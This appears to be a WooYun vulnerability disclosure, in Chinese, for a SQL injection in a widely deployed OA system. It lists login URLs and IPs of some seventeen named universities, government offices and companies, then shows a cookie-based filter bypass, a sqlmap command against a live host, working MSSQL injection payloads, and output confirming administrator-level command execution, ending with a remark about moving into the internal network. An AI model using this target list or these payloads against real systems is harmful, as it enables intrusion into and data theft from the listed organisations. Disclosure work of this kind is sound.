WooYun.org

fofa.so: id="FTongJi"
http://121.30.226.44/login.asp 大同煤矿集团雁崖煤业公司
http://124.65.69.14/login.asp 路恒安市政工程
http://vos.tjufe.edu.cn/login.asp 天津财经大学
http://211.68.250.42/login.asp 天津农学院
http://www.fzsyxx.com/oa/ 抚州市实验学校
http://oa.ccib.com.cn/login.asp 长城保险
http://www.cnshuiyu.com/login.asp 上海水域环境发展有限公司
http://oa.tjfsu.edu.cn/login.asp 天津外国语大学
http://old.mdjagri.gov.cn/oa/login.asp 海天网络
http://60.171.34.204:8086/ 淮南市城市管理行政执法局
http://116.228.82.237/login.asp 德林义肢
http://dfoa.shhjwl.com/login.asp 上海东飞公司
http://www.cnshuiyu.com/login.asp 上海水域环境发展有限公司
http://211.68.192.21/login.asp 天津音乐学院
http://121.30.226.44/login.asp 大同煤矿集团
http://180.166.7.94/login.asp 上海市市容环境卫生汽车运输处
http://cqkyoa.oicp.net/login.asp 科云建筑有限公司
....more
u神很早前提交了关于该问题的漏洞( WooYun: 某OA系统存在通用SQL注射漏洞#通通Sa权限 )，看看修复情况
以http://oa.hjshy.com:81/InforForWeb/list.asp?id=7023%E2%80%99%20and为例
添加 ' and '1'='1
被拦截
过滤了and update select ...等关键词
对于asp,可以转移下到cookie，然后就可以绕过过滤了。。
Python sqlmap.py -u "http://oa.hjshy.com:81/InforForWeb/list.asp" --cookie "id=7023" --level 2
Place: Cookie
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7023 AND 6328=6328
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=7023 AND 7036=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(102)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (7036=7036) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(115)+CHAR(101)+CHAR(99)+CHAR(113)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=7023; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=7023 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
command standard output:
---
win-abv99p5cj8c\administrator

win-abv99p5cj8c\administrator
---
这个权限有点大。。。。可以搞内网了。。。。